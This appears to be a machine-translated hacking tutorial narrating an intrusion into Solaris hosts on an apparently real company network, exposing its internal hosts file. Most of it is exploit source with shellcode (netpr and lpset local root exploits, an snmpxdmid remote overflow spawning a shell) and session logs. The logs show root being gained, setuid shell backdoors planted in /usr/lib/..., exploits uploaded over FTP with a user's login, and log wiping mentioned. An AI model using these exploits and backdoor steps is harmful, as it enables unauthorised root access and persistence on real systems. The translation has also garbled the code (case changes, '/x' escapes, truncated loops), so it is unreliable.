UNIX intrusion process (2)
/ * ## CopyRight Last Stage Of Delirium Dec 1999 Poland *: //lsd-pl.net/ # * / / * ## / usr / lib / lp / bin / netpr # * / / * Requires to Specify The Address of A host with 515 port opened * / #define NOPNUM 4000 #define adrnum 1200 #define allign 3 char shellcode [] = "/ x20 / xbf / xff / xff" / * BN, A
* /
"/ X20 / XBF / XFF / XFF" / * BN, A
* /
"/ X7F / XFF / XFF / XFF" / * CALL
* /
"/ x90 / x03 / xe0 / x20" / * add% o7, 32,% o0 * /
"/ x92 / x02 / x20 / x10" / * add% o0, 16,% o1 * /
"/ XC0 / X22 / X20 / X08" / * ST% G0, [% O0 8] * /
"/ xd0 / x22 / x20 / x10" / * ST% O0, [% O0 16] * /
"/ XC0 / X22 / X20 / X14" / * ST% G0, [% O0 20] * /
"/ x82 / x10 / x20 / x0b" / * mov 0xb,% g1 * /
"/ x91 / xd0 / x20 / x08" / * ta 8 * /
"/ bin / ksh"
;
Char jump [] =
"/ x81 / xc3 / xe0 / x08" / * jmp% O7 8 * /
"/ x90 / x10 / x00 / x0e" / * MOV% SP,% o0 * /
;
Static char NOP [] = "/ x80 / x1c / x40 / x11";
Main (int Argc, char ** argv) {
Char Buffer [10000], ADR [4], * B, * ENVP [2];
INT I;
Printf ("Copyright Last Stage Of Delirium Dec 1999 Poland //LSD-PL.NET//N");
Printf ("/ usr / lib / lp / bin / netpr solaris 2.7 sparc / n / n");
IF (argc == 1) {
Printf ("USAGE:% S lpserver / n", argv [0]);
EXIT (-1);
}
* (UNSIGNED Long *) ADR) = (* (unsigned long (*) ()) jump) () 7124 2000;
Envp [0] = & buffer [0];
ENVP [1] = 0;
B = & buffer [0];
Sprintf (b, "xxx =");
B = 4;
For (i = 0; i <1 4 - (Strlen (Argv [1])% 4); i ) * b = 0xFF; for (i = 0; i
For (i = 0; i
* b = 0;
B = & buffer [5000];
For (i = 0; i
For (i = 0; i
* b = 0;
Execle ("/ USR / LIB / LP / BIN / NETPR", "LSD", "- I", "BZZ-Z", "- U", "X! X", "- D", Argv [1] ,
"-p", & buffer [5000], "/ bin / sh", 0, eNVP);
}
^ D (*** Here is the end of the Ctrl D, you can use VI to write, FTP, RCP and other uploads can also be. ***)
(*** source program at http://lsd-pl.net/files/get?solaris/solsparc_netpr ***)
$ Ls -al / tmp (*** View Test.c is built ***)
Total 1330
DRWXRWXRWT 7 Sys Sys 1049 JUL 4 19:07.
Drwxrwxrwx 35 root root 1024 jun 29 16:52..
DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-PIPE
DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-unix
DRWXRWXRWX 2 root root 179 May 4 14:39 .pcmcia
Drwxrwxrwx 2 root other 181 JUN 20 13:18.removable
Drwxrwxrwt 2 root root 327 May 4 14:39.rpc_door
-rwxrwxr-x 1 root other 614 May 8 11:17 enctest.class
-rw ------- 1 root other 265936 May 4 14:40 DTDBCACHE_: 0
-rw ------- 1 Render9 Render 0 May 8 11:42 Mpcraohb
-rw ------- 1 Render9 Render 0 May 8 13:02 Mptwagyf
-rw-rw-r - 1 root sys 5248 May 4 14:39 PS_DATA
-rw-rw-r - 1 root other 0 jun 20 13:18 sdtvolcheck399
-rw-r - r - 1 root Other 4 May 4 14:39 SpecKeysd.lock
-rw-rw-r - 1 delex staff 2019 JUL 4 19:10 Test.c
-rw-rw-r - 1 root sys 326236 May 7 11:30 UPS_DATA
$ GCC -O Test Test.c (*** is generally compiled with this way, more information, please see the help ***)
$ ./Test
Copyright last stage of delirium dec 1999 poland //lsd-pl.net/
/ usr / lib / lp / bin / netpr Solaris 2.7 sparcusage: ./test lpserver
$ ./Test localhost
Copyright last stage of delirium dec 1999 poland //lsd-pl.net/
/ usr / lib / lp / bin / netpr Solaris 2.7 SPARC
# Id
UID = 1035 (Delex) GID = 20 (STAFF) EUID = 0 (ROOT) (*** successfully obtained root ***)
# MKDIR / USR / LIB / ...
# Cp / bin / ksh /usr/lib/... / (*** is a simple back door ***)
# Chmod S /USR/LIB/...
# Cat / etc / hosts (*** Take a look at how big this network ***)
########################################################################################################################################################################################################################################################################################################
## GIPS LIMITED Server Hosts Names
## 2001-03-01 (Develop)
########################################################################################################################################################################################################################################################################################################
127.0.0.1 Localhost Loghost
########################################################################################################################################################################################################################################################################################################
## Gipex (Internal - Citic Back-End)
192.168.2.1 Office-i2 Gate-Citic-Backend
192.168.2.5 Render1 Render1-I1
########################################################################################################################################################################################################################################################################################################
## GIPEX (Internal - Citic Office)
192.168.1.11 Office-i1 Gate-Citic-Office
########################################################################################################################################################################################################################################################################################################
## GIPEX (Internal - Ilink)
192.168.100.1 Backup-I1 Gate-ILINK-VPN
## .2 - .9
192.168.100.10 WWW1-I1
192.168.100.11 DB1 DB1-I1 WWW0-I1 www0 www0.xxwex.com
192.168.100.12 SNAP1
## .13
192.168.100.14 SNAP2
192.168.100.15 SNAP3
192.168.100.16 WWW2-I1 MAIL-I1
192.168.100.17 WWW2-I2 MAIL-I2
192.168.100.18 Render2 Render2-I1
192.168.100.19 Render2-I2
## .20 - .252
192.168.100.253 Switch1
## .254
# / Usr / sbin / ping 192.168.100.253
ICMP Host Unreachable from Gateway Wc-sf1.kage.NET (210.76.87.2)
For ICMP from develop (192.168. 0.2) to WWW1-I1 (192.168.100.253)
ICMP Host Unreachable from Gateway Wc-sf1.kage.NET (210.76.87.2)
For ICMP from develop (192.168.0.2) to WWW1-I1 (192.168.100.253)
ICMP host unreachable from getway wc-sf1.kage.net (210.76.87.2) for ICMP from development (192.168.0.2) to WWW1-I1 (192.168.100.253)
^ C (*** LAN is connected ***)
#
------------------------------------------------ Test -------------------------------------------------- ----------------
I will slowly get my internal Internet.
Now go back to take this SunOS 5.6.
------------------------------------------------ Test -------------------------------------------------- ----------------
# Cat> lpset.c (*** source program at http://lsd-pl.net/files/get?solaris/solsparc_lpset ***)
/ * ## Copyright Last Stage of Delirium Apr 2000 Poland *: //lsd-pl.net/ # * /
/ * ## / usr / bin / lpset # * /
#define nopnum 864
#define adrnum 132
#define allign 3
Char shellcode [] =
"/ X20 / XBF / XFF / XFF" / * BN, A
* /
"/ X20 / XBF / XFF / XFF" / * BN, A
* /
"/ X7F / XFF / XFF / XFF" / * CALL
* /
"/ x90 / x03 / xe0 / x20" / * add% o7, 32,% o0 * /
"/ x92 / x02 / x20 / x10" / * add% o0, 16,% o1 * /
"/ XC0 / X22 / X20 / X08" / * ST% G0, [% O0 8] * /
"/ xd0 / x22 / x20 / x10" / * ST% O0, [% O0 16] * /
"/ XC0 / X22 / X20 / X14" / * ST% G0, [% O0 20] * /
"/ x82 / x10 / x20 / x0b" / * mov 0xb,% g1 * /
"/ x91 / xd0 / x20 / x08" / * ta 8 * /
"/ bin / ksh"
;
Char jump [] =
"/ x81 / xc3 / xe0 / x08" / * jmp% O7 8 * /
"/ x90 / x10 / x00 / x0e" / * MOV% SP,% o0 * /
;
Static char NOP [] = "/ x80 / x1c / x40 / x11";
Main (int Argc, char ** argv) {
Char buffer [10000], ADR [4], * B;
INT I;
Printf ("Copyright Last Stage of Delirium Apr 2000 Poland //LSD-PL.NET//n" :printf ("/r/bin/lpset for Solaris 2.6 2.7 SPARC / N / N ");
* (UNSIGNED Long *) ADR) = (* (unsigned long (*) ()) jump) () 10088 400;
B = buffer;
Sprintf (b, "xxx =");
B = 4;
For (i = 0; i <2; i ) * b = 0xFF;
For (i = 0; i
For (i = 0; i
For (i = 0; i
For (i = 0; i
* b = 0;
Execle ("/ USR / BIN / LPSET", "LSD", "- N", "XFN", "- A", Buffer, "Printer", 0, 0);
}
^ D
# Gcc -o lpset lpset.c
/ bin / ksh: GCC: Not found
# Exit
$ Gcc -o lpset lpset.c
$ Ls -al
Total 1410
DRWXRWXRWT 7 SYS SYS 1236 JUL 4 20:33.
Drwxrwxrwx 35 root root 1024 jul 4 19:15 ..
DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-PIPE
DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-unix
DRWXRWXRWX 2 root root 179 May 4 14:39 .pcmcia
Drwxrwxrwx 2 root other 181 JUN 20 13:18.removable
Drwxrwxrwt 2 root root 327 May 4 14:39.rpc_door
-rwxrwxr-x 1 root other 614 May 8 11:17 enctest.class
-rw ------- 1 root other 265936 May 4 14:40 DTDBCACHE_: 0
-rwxrwxr-x 1 delex staff 8572 JUL 4 20:33 lpset
-rw-rw-r - 1 delex staff 1685 JUL 4 20:32 lpset.c
-rw ------- 1 Render9 Render 0 May 8 11:42 Mpcraohb
-rw ------- 1 Render9 Render 0 May 8 13:02 Mptwagyf
-rw-rw-r - 1 root sys 5248 May 4 14:39 PS_DATA
-rw-rw-r - 1 root other 0 jun 20 13:18 sdtvolcheck399
-rw-r - r - 1 root Other 4 May 4 14:39 SpecKeysd.lock
-rwxrwxr-x 1 delex staff 8916 Jul 4 19:13 Test
-rw-rw-r - 1 delex staff 2019 JUL 4 19:10 Test.c-rw-rw-r - 1 root sys 326236 May 7 11:30 UPS_DATA
$ Ftp 192.168.0.3
Connected to 192.168.0.3.
220 dev01 FTP Server (SunOS 5.6) Ready.
Name (192.168.0.2:delex): Tong
331 Password Required for tong.
PASSWORD:
230 User tong logged in.
FTP> CD / TMP
250 CWD Command Successful.
FTP> bin (*** Set up the upload mode is binary ***)
200 Type Set to I.
FTP> PUT LPSET
200 Port Command Successful.
150 Binary Data Connection for LPSET (192.168.0.2, 49105).
226 Transfer Complete.
Local: lpset Remote: lpset
8572 BYTES SENT IN 0.00054 Seconds (15617.71 kbytes / s)
FTP> by
221 Goodbye.
$ Telnet 192.168.0.3
Trying 192.168.0.3 ...
Connected to 192.168.0.3.
Escape Character is '^]'.
Sunos 5.6
Login: Tong
PASSWORD:
Last Login: Wed Jul 4 20:31:37 from 192.168.0.2
Sun Microsystems Inc. Sunos 5.6 Generic August 1997
You have mail.
$ / TMP / LPSET
/ TMP / LPSET: Cannot EXECUTE
$ CHMOD 755 / TMP / LPSET
$ / TMP / LPSET
Copyright last stage of delirium apr 2000 poland //lsd-pl.net/
/ usr / bin / lpset for Solaris 2.6 2.7 SPARC
# Id
UID = 107 (tong) GID = 10 (STAFF) EUID = 0 (*** Hoho ~ Didn't die? ***)
#mkdir / usr / lib / ...
#CP / bin / ksh /usr/lib/...
#CHMOD S /USR/LIB/...
#exit
$ EXIT
Connection Closed by Foreign Host. (*** No, footprint does not rub ***)
$ EXIT
Lost connection to the host.
C: />
------------------------------------------------ Test -------------------------------------------------- ----------------
Oh, why not do it? Disconnected? Don't even rub the footprint?
Hey, brothers, now 21:00, but also to take the subway. Originally 20:30, you will go, continue tomorrow, can't manage so much. Let's go back to see me before.
The tutorial, how to rub the PP. In order to save the layout, this tutorial will not show PP, you have to know how to wipe it. :) Right, learn from the use of remote overflow tomorrow, then find a few redhat back.
Go back, your stomach is also hungry, see you tomorrow ~~
ZZZZZZZZZ ~~~~~~~~
the next day:
Hey, everyone is good morning ~
I am going to work today, I have to be assigned, I will ask.
Shot ...
True, assigned tasks.
However, it started from next week. :)
So I will write the tutorial today.
I don't know if I can write this tutorial today.
We continue. :)
Yesterday, the method of local upgrading permissions, today we will talk about remote overflow.
Almost various operating systems have a serious remote overflow vulnerability.
Commonly known:
RPC.TTDBServerd from Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6
RPC.cmsd from Solaris 2.5, 2.5.1, 2.6, 7
SADMIND of Solaris 2.6, 7
SNMPXDMID of Solaris 7, 8
RedHat 6.0, 5.1, 4.0 AMD
RPC.Statd of Redhat 6.2, 6.1, 6.0
Redhat 7.0 LPRNG
...
Other systems are not listed.
In addition to the problem of the system itself, there are some third-party programs have problems.
For example, common FTP server Wu-ftp, version 2.6.0 and below are serious remote overflow issues
For example, DNS Server Bind, Version 8.2.2 and the following versions have a serious remote overflow problem.
...
It is too much to take advantage of it, and you need to take time, you need to rely on experience.
After the experience is rich, invade a simple system, just get the other party's system version, then scan the port is enough. Because you have already
The weaknesses of the system and daemon have been well understood.
We tried to enter a machine of Solaris 8 this time.
------------------------------------------------ Test -------------------------------------------------- ----------------
C: /> Telnet 192.168.0.2
Sunos 5.7
Login: Login: Delex
PASSWORD:
*********************************************************** *******
# The jrun is now replaced by jserv
# To restart the servlet server, please use
Rs.sh
# However, As The Jserv Will Reload Those Classes
# INSIDE The "/ usr / proj / gipex / class", you JUST
#Need to remove the old class with the new one.
*********************************************************** *******
$ W
9:21 AM UP 61 Day (s), 18:42, 2 Uses, Load Average: 0.03, 0.04, 0.05
User tty login @ iDLE JCPU PCPUWHAT
Root console 4MAY0162DAYS 2 2 / USR / DT / BIN / SDT_SHELL-C? u
Root PTS / 4 FRI 4PM 6DAYS TAIL -F SYSLOG
Delex PTS / 6 9:21 AM W
$ ls -al / usr / lib / ...
Total 202
DRWXRWXR-X 2 Root Staff 512 JUL 5 10:22.
Drwxrwxr-x 46 root bin 10240 Jul 4 19:21 ..
-R-SR-SR-X 1 Root Staff 91668 JUL 5 10:22 .x
$ ID
UID = 1035 (delex) GID = 20 (STAFF)
$ /Usr/lib/...x (*** running the local back door left yesterday, get root permissions ***)
# Id
UID = 1035 (Delex) GID = 20 (STAFF) EUID = 0 (root)
# CD / TMP
# Ls -al (*** Yesterday's procedure forgot to delete, walk too hast, don't know if it is not there ***)
Total 1410
DRWXRWXRWT 7 SYS SYS 1236 JUL 5 10:20.
Drwxrwxrwx 35 root root 1024 jul 4 19:15 ..
DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-Pipe
DRWXRWXR-X 2 root root 176 May 4 14:39 .x11-unix
DRWXRWXRWX 2 root root 179 May 4 14:39 .pcmcia
Drwxrwxrwx 2 root other 181 JUN 20 13:18.removable
Drwxrwxrwt 2 root root 327 May 4 14:39.rpc_door
-rwxrwxr-x 1 root other 614 May 8 11:17 enctest.class
-rw ------- 1 root other 265936 May 4 14:40 DTDBCACHE_: 0
-rwxrwxr-x 1 delex staff 8572 JUL 4 20:33 lpset (*** hoho ~ **)
-rw-rw-r - 1 delex staff 1685 JUL 4 20:32 lpset.c
-rw ------- 1 Render9 Render 0 May 8 11:42 Mpcraohb
-rw ------- 1 Render9 Render 0 May 8 13:02 Mptwagyf
-rw-rw-r - 1 root sys 5248 May 4 14:39 PS_DATA
-rw-rw-r - 1 root other 0 jun 20 13:18 sdtvolcheck399
-rw-r - r - 1 root Other 4 May 4 14:39 SpecKeysd.lock
-rwxrwxr-x 1 delex staff 8916 Jul 4 19:13 Test
-rw-rw-r - 1 delex staff 2019 JUL 4 19:10 Test.c
-rw-rw-r - 1 root sys 326236 May 7 11:30 UPS_DATA
# Cat> snmp.c (*** source program at http://lsd-pl.net/files/get?solaris/solsparc_snmpxdmid ***)
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define snmpxdmid_prog 100249
#define snmpxdmid_vers 0x1
#define snmpxdmid_addcomponent 0x101
Char findsckcode [] =
"/ X20 / XBF / XFF / XFF" / * BN, A
* /
"/ X20 / XBF / XFF / XFF" / * BN, A
* /
"/ X7F / XFF / XFF / XFF" / * CALL
* /
"/ x33 / x02 / x12 / x34"
"/ Xa0 / X10 / X20 / XFF" / * MOV 0xFF,% l0 * /
"/ xa2 / x10 / x20 / x54" / * mov 0x54,% l1 * /
"/ XA4 / X03 / XFF / XD0" / * Add% O7, -48,% L2 * /
"/ XAA / X03 / XE0 / X28" / * add% O7, 40,% L5 * /
"/ x81 / xc5 / x60 / x08" / * jmp% L5 8 * /
"/ XC0 / X2B / XE0 / X04" / * STB% G0, [% O7 4] * /
"/ XE6 / X03 / XFF / XD0" / * LD [% O7-48],% L3 * /
"/ XE8 / X03 / XE0 / X04" / * LD [% O7 4],% L4 * /
"/ xa8 / xa4 / xc0 / x14" / * SUBCC% L3,% L4,% L4 * /
"/ X02 / XBF / XFF / XFB" / * BZ
* /
"/ XAA / X03 / XE0 / X5C" / * Add% O7, 92,% L5 * /
"/ XE2 / X23 / XFF / XC4" / * ST% L1, [% O7-60] * /
"/ XE2 / X23 / XFF / XC8" / * ST% L1, [% O7-56] * /
"/ Xe4 / X23 / XFF / XCC" / * ST% L2, [% O7-52] * /
"/ x90 / x04 / x20 / x01" / * add% L0, 1,% o0 * /
"/ Xa7 / X2C / X60 / X08" / * SLL% L1, 8,% L3 * /
"/ x92 / x14 / xe0 / x91" / * OR% L3, 0x91,% O1 * /
"/ x94 / x03 / xff / xc4" / * add% O7, -60,% o2 * / "/ x82 / x10 / x20 / x36" / * MOV 0x36,% G1 * /
"/ x91 / xd0 / x20 / x08" / * ta 8 * /
"/ x1a / xbf / xff / xf1" / * BCC
* /
"/ xa0 / xa4 / x20 / x01" / * Deccc% l0 * /
"/ x12 / xbf / xff / xf5" / * BNE
* /
"/ Xa6 / x10 / x20 / x03" / * MOV 0x03,% L3 * /
"/ x90 / x04 / x20 / x02" / * add% l0, 2,% o0 * /
"/ x92 / x10 / x20 / x09" / * MOV 0x09,% o1 * /
"/ X94 / X04 / XFF / XFF" / * Add% L3, -1,% O2 * /
"/ x82 / x10 / x20 / x3e" / * MOV 0x3e,% g1 * /
"/ Xa6 / X84 / XFF / XFF" / * AddCC% L3, -1,% L3 * /
"/ x12 / xbf / xff / xfb" / * BNE
* /
"/ x91 / xd0 / x20 / x08" / * ta 8 * /
;
Char shellcode [] =
"/ X20 / XBF / XFF / XFF" / * BN, A
* /
"/ X20 / XBF / XFF / XFF" / * BN, A
* /
"/ X7F / XFF / XFF / XFF" / * CALL
* /
"/ x90 / x03 / xe0 / x20" / * add% o7, 32,% o0 * /
"/ x92 / x02 / x20 / x10" / * add% o0, 16,% o1 * /
"/ XC0 / X22 / X20 / X08" / * ST% G0, [% O0 8] * /
"/ xd0 / x22 / x20 / x10" / * s "/ xc0 / x22 / x20 / x14" / * ST% G0, [% O0 20] * /
"/ x82 / x10 / x20 / x0b" / * MOV 0x0b,% g1 * /
"/ x91 / xd0 / x20 / x08" / * ta 8 * /
"/ bin / ksh"
;
Static char NOP [] = "/ x80 / x1c / x40 / x11";
Typedef struct {
Struct {UNSIGNED INT LEN; Char * Val;} Name
Struct {unsigned int Len; char * val;} pragma
} REQ_T;
BOOL_T XDR_REQ (XDR * XDRS, Req_t * Objp) {
Char * v = null; unsigned long L = 0; int b = 1; if (! xdr_u_long (xdrs, & l)) Return (false);
IF (! xdr_pointer (xdrs, & v, 0, (xdrproc_t) null) Return (false);
IF (! XDR_BOOL (XDRS, & B)) Return (False);
IF (! XDR_U_LONG (XDRS, & L)) Return (false);
IF (! XDR_BOOL (XDRS, & B)) Return (False);
IF (! xdr_array (xdr_Array (xDRS, & objP-> name.val, & objp-> name.len, ~ 0, sizeof (char),
(xDrProc_t) xdr_char)) Return (false);
IF (! XDR_BOOL (XDRS, & B)) Return (False);
IF (! xdr_array (xdr_Array (xdrs, & objp-> pragma.val, & objp-> pragma.len, ~ 0, sizeof (char),
(xDrProc_t) xdr_char)) Return (false);
IF (! xdr_pointer (xdrs, & v, 0, (xdrproc_t) null) Return (false);
IF (! XDR_U_LONG (XDRS, & L)) Return (false);
Return (TRUE);
}
Main (int Argc, char ** argv) {
Char Buffer [140000], Address [4], PCH [4], * B;
INT I, C, N, VERS = -1, port = 0, SCK;
Client * Cl; Enum CLNT_STAT STAT;
Struct hostent * hp;
Struct SockAddr_in ADR;
Struct TimeValTM = {10,0};
REQ_T REQ;
Printf ("Copyright Last Stage of Delirium Mar 2001 Poland //LSD-PL.NET//N");
Printf ("SNMPXDMID for Solaris 2.7 2.8 SPARC / N / N");
IF (argc <2) {
Printf ("USAGE:% s address [-P port] -V 7 | 8 / n", argv [0]);
EXIT (-1);
}
While ((c = getopt (argc-1, & argv [1], "p:"))! = - 1) {
Switch (c) {
Case 'P': port = atoi (OPTARG); Break;
Case 'V': VERS = ATOI (OPTARG);
}
}
Switch (VERS) {
Case 7: * (unsigned int *) address = 0x000b1868;
Case 8: * (unsigned int *) address = 0x000cf2c0; break;
DEFAULT: EXIT (-1);
}
* (unsigned long *) PCH = HTONL (* (unsigned int *) Address 32000);
* (unsigned long *) address = htonl (* (unsigned int *) Address 64000 32000);
Printf ("ADR = 0x% 08X Timeout =% D", NTOHL (* (unsigned long *) address, tm.tv_sec);
Fflush (stdout); adr.sin_family = af_INet;
ADR.sin_port = HTONS (port);
IF ((adr.sin_addr.s_addr = inet_addr (argv [1])) == - 1) {
IF ((hp = gethostByname) == null) {
Errno = EADDRNOTAVAIL; PERROR ("error"); exit (-1);
}
Memcpy (& adj to_addr.s_addr, hp-> h_addr, 4);
}
SCK = RPC_Anysock;
IF (! (CL = CLNTTCP_CREATE (& ADR, SNMPXDMID_PROG, SNMPXDMID_VERS, & SCK, 0, 0))) {
CLNT_PCREATEERROR ("Error"); exit (-1);
}
Cl-> cl_auth = authunix_create ("localhost", 0, 0, 0, null);
i = sizeof (struct sockaddr_in);
IF (GetSockName (STRUCT SOCKADDR *) & ADR, & I) == - 1) {
Struct {UNSIGNED INT MAXLEN; UNSIGNED INT LEN; CHAR * BUF;} NB;
IOCTL (SCK, (('s' << 8) | 2), "sockmod");
Nb.maxlen = 0xfffff;
nb.len = sizeof (struct sockaddr_in) ;;
Nb.buf = (char *) & ADR;
IOCTL (SCK, (('T' << 8) | 144), & nb);
}
n = ntoHS (adr.sin_port);
Printf ("Port =% D Connected!", N); FFLUSH (stdout);
FINDSCKCODE [12 2] = (Unsigned Char) ((N & 0xFF00) >> 8);
FINDSCKCODE [12 3] = (unsigned char) (N & 0xFF);
B = & buffer [0];
For (i = 0; i <1248; i ) * b = pch [i% 4];
For (i = 0; i <352; i ) * b = address [i% 4];
* b = 0;
B = & buffer [10000];
For (i = 0; i <64000; i ) * b = 0;
For (i = 0; i <64000-188; i ) * b = NOP [I% 4];
For (i = 0; i
For (i = 0; i
* b = 0;
Req.name.len = 1200 400 4;
Req.name.val = & buffer [0];
Req.pragma.len = 128000 4;
Req.pragma.val = & buffer [10000];
Stat = CLNT_CALL (Cl, SNMPXDMID_ADDComponent, XDR_Req, & Req, XDR_VOID, NULL, TM);
IF (stat == rpc_success) {Printf ("/ Nerror: not vulnerable / n"); exit (-1);} printf ("Sent! / N");
Write (SCK, "/ bin / uname -a / n", 14);
While (1) {
FD_SET FDS;
FD_ZERO (& FDS);
FD_SET (0, & fds);
FD_SET (SCK, & FDS);
IF (SELECT (FD_SETSIZE, & FDS, NULL, NULL, NULL) {
int CNT;
Char BUF [1024];
IF (fd_isset (0, & fds)) {
IF ((CNT = Read (0, BUF, 1024)) <1) {
IF (errno == ewouldblock || errno == eagain) Continue;
Else Break;
}
Write (SCK, BUF, CNT);
}
IF (fd_isset (SCK, & FDS)) {
IF ((CNT = Read (SCK, BUF, 1024) <1) {
IF (errno == ewouldblock || errno == eagain) Continue;
Else Break;
}
Write (1, BUF, CNT);
}
}
}
}
^ D